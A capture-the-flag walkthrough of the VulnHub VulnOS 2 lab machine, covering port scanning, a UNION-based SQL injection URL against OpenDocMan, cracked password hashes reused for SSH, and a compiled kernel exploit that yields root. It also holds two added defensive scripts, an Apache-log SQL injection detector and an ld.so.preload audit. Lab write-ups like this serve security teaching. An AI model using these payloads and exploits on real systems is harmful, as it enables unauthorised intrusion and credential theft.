Vulnhub VulnOS 2 walkthrough | SQL injection in URL
VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.
root@kali:~# nmap -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Identify the services and versions running on VulnOS:
root@kali:~/Documents/vulnhub/vulnOS# nmap -sVC -vv -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up, received arp-response (0.00022s latency).
Scanned at 2020-01-15 21:54:19 IST for 20s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAORRAsDcJJtkwMruX4yXojqiox8ni/JHNX/zgwtmPcfLkENKY5bYD1dMpASvE0K9Gh5Mo4U/yycRK9xHGLMssBBr5F8QOq8I66Ee7kOG+CJzT+g5Fhl+0R5pI2+kEGSipf+mL1A1HA9JYm87rNWkG3mI5cS4J2okX2CMZGPYucflAAAAFQCdR4coK0rgndw4wMd7SCCewTd5QQAAAIBGnb2CKZQhnmy7G/Dublt921HOMTOb3jXJugIp/Q0g9sQEkYQoEEXOS5+kDVODt7C1rgZQzvY4eX2gnEcW38esIIYVX5j54bV7RpcYTs+3onSvpLJJJudFOF8jS/J53DeiQ9sS68bCDi1K7h7f5dLeaemKJz8j42/8mdUpEZ+xHAAAAIBXyrkDziSMSuaCSxkfwFMzlqFWNI5EszgByhcHsuNYhrRryrZkC/Jq7ypWv2vt1zlkem9z/l5eX7gxwhckbQgPHqKxtmfznzoosQ0EoHAnG+bO7VXDM1yFl5xCXBLFvFlE6QjYJBcrtz9jeAJHUlyXAYIrSthz6y4OCc0rGAxC+g==
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDpuBQNKY6U8FF+8yJgjCqn0f9MJ1rCgGLo2HdvhWvbgyOxmvf4mg47Oi4OWjpD7oiiaawPLFJfUPhBl7CVLLnMQxM6MDdmJP1qSl6slA52KB9Qt8hvPiatY9yF2UzTQ+riP9g2n6D9QQruSVQQFsKUeJvte2X7EApMmmXSQ1L/Qziio1mFu4tvqckMsfdjlYnFSRSdKoorT/7/Vw0sBUzDNsSsGq8tA3rqGOKmj3JdS0H0FGEciLFyIx9/rLC2bHc03l2V08Y8MozB3TQTcO6lvxpFgSAEPmNglCAMSZOIFmdIvpmi5FfHsVuP6O94twetVHq0CyvihY8SoXQoiqib
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMTthIC3/w1NQVyFFPrMh63/cVUWJylryc7v9Whbab9DKivYIWxffvI6HJpjeMm63ChJV9HjkbtGBbKhnNeRJ64=
| 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMx/VEravl9aUxne0KuM0Eexc8iu9sMLlyKfDQJ7XIn4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc syn-ack ttl 64 ngircd
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 21:54:39 2020 -- 1 IP address (1 host up) scanned in 21.16 seconds
Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))
Open http://10.0.0.127 in a web browser.
Let's follow the hyperlink on the page. We are presented with another website.
The documentation tab gives away some information about a new site and its credentials.
Click on Home.
The URL looks like http://10.0.0.127/jabc/?q=node/1; changing the value from 1 through 7 reaches pages such as http://10.0.0.127/jabc/?q=node/7.
Then open Documentation: the page shows nothing on screen, but the page source contains something like:
<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at on the server. Just login with guest/guest</span></p>
<p><span style="color:#000000">Thank you.</span></p>
This reveals a new directory, /jabcd0cs/.
Open http://10.0.0.127/jabcd0cs/.
We see a login page. I log in with guest/guest and try uploading a PHP reverse shell, but it does not upload.
Then I log out from guest,
and now I try SQL injection in the login page
and find an error.
Now I search for an OpenDocMan v1.2.7 exploit.
The exploit states that the odm_user parameter is vulnerable to SQL injection.
Then, in the URL:
http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns
This enumerates the usernames and password hashes from odm_user:
webmin:b78aae356709f8c31118ea613980954b
guest:084e0343a0486ff05530df6c705c8bb4
Then crack the hashes using CrackStation:
webmin:b78aae356709f8c31118ea613980954b:webmin1980
guest:084e0343a0486ff05530df6c705c8bb4:guest
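From the defender's side, the injected request above leaves a clear trace in the web server's access log. As an added example (not part of the original walkthrough), this Python script URL-decodes each query parameter of Apache combined-format log lines and flags UNION-based injection patterns; the sample log lines are constructed to mirror the requests in this write-up, with made-up client IP, timestamps and user agent.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache combined-format lines modelled on this walkthrough's
# requests; the client IP, timestamps and user agent are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2020:21:58:01 +0530] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Jan/2020:21:58:30 +0530] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9%20from%20information_schema.columns HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Jan/2020:21:59:02 +0530] "GET /jabc/?q=node/7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Jan/2020:21:59:40 +0530] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION/**/SELECT%201,2,username,password,5,6,7,8,9%20from%20odm_user HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Patterns typical of UNION-based SQL injection, checked against decoded values.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b\W+(?:all\W+)?select\b", re.I),  # UNION SELECT, UNION/**/SELECT
    re.compile(r"\binformation_schema\b", re.I),            # schema enumeration
    re.compile(r"\bconcat\s*\(", re.I),                     # packing columns into one field
]

def decoded_params(target):
    """Yield (name, value) per query parameter; parse_qs decodes once and
    unquote_plus decodes again so double URL-encoding is also caught."""
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            yield name, unquote_plus(value)

def detect_sqli(log_text):
    """Return one (ip, timestamp, path, parameter, pattern) tuple per request
    whose decoded query parameters match an injection pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        for name, value in decoded_params(m["target"]):
            for pat in SQLI_PATTERNS:
                if pat.search(value):
                    hits.append((m["ip"], m["ts"], path, name, pat.pattern))
                    break  # one finding per parameter is enough
    return hits

if __name__ == "__main__":
    for hit in detect_sqli(SAMPLE_LOG):
        print("SQLi suspected:", hit)
```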
Then log in over SSH with user webmin and password webmin1980.
Now I have a shell and convert it to a proper shell:
webmin@VulnOSv2:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
Privilege Escalation
Search the OpenDocMan directory structure to find where OpenDocMan stores its config files.
After some enumeration we found config.php:
webmin@VulnOSv2:/var/www/html/jabcd0cs$ cat config.php
It contains the MySQL credentials: user root, password toor.
Trying the MySQL root password as the system root password gives an authentication failure:
webmin@VulnOSv2:/var/www/html/jabcd0cs$ su root
Password:
su: Authentication failure
webmin@VulnOSv2:/var/www/html/jabcd0cs$
Then try sudo -l:
webmin@VulnOSv2:/var/www/html/jabcd0cs$ sudo -l
[sudo] password for webmin:
Sorry, user webmin may not run sudo on VulnOSv2.
webmin@VulnOSv2:/var/www/html/jabcd0cs$
Then try:
webmin@VulnOSv2:/var/www/html/jabcd0cs$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
Then searchsploit for kernel 3.13.0-24-generic #47-Ubuntu:
root@kali:~/Documents/vulnhub/vulnOS# searchsploit ubuntu
Linux Kernel 2.13.0 < 3.19 (Ubun | exploits/linux/local/37292.c
Compile the exploit using gcc:
webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs
and run the exploit:
webmin@VulnOSv2:/tmp$ ls
37292.c ofs vulnoskernal
webmin@VulnOSv2:/tmp$ ./ofs
webmin@VulnOSv2:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
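The line "/etc/ld.so.preload created" in the exploit output is the artefact a defender should hunt for: on a default install that file does not exist. As an added example (not part of the original walkthrough), this Python audit reports an ld.so.preload file that exists at all, is a symlink, is not root-owned or is group/world writable, or lists a library outside the system library directories; the file contents and library paths in the demo are constructed.

```python
import os
import stat
import tempfile

# Directories a legitimately preloaded library would normally live under.
TRUSTED_LIB_DIRS = tuple(d + "/" for d in (
    "/lib", "/lib32", "/lib64", "/usr/lib", "/usr/lib32", "/usr/lib64", "/usr/local/lib"))

def audit_ld_preload(path="/etc/ld.so.preload"):
    """Return a list of finding strings; an empty list means the file is absent,
    which is the expected state on most systems."""
    findings = []
    if not os.path.lexists(path):
        return findings
    findings.append(f"{path} exists (absent on a default install)")
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{path} is a symlink")
    if st.st_uid != 0:
        findings.append(f"{path} is not owned by root (uid {st.st_uid})")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is group/world writable")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            entry = raw.split("#", 1)[0].strip()  # ld.so ignores comments
            for lib in entry.split():             # entries are space-separated
                if not lib.startswith(TRUSTED_LIB_DIRS):
                    findings.append(f"line {lineno}: library outside system lib dirs: {lib}")
                elif not os.path.exists(lib):
                    findings.append(f"line {lineno}: listed library missing from disk: {lib}")
    return findings

def demo_with_constructed_file():
    """Write a constructed ld.so.preload into a temp file, audit it, clean up."""
    content = "# constructed sample\n/tmp/ofs.so /usr/lib/libconstructed_does_not_exist.so\n"
    fd, tmp_path = tempfile.mkstemp(suffix=".preload")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(content)
        return audit_ld_preload(tmp_path)
    finally:
        os.unlink(tmp_path)

if __name__ == "__main__":
    for finding in demo_with_constructed_file():
        print("FINDING:", finding)
```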
Then:
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
enjoy your hacking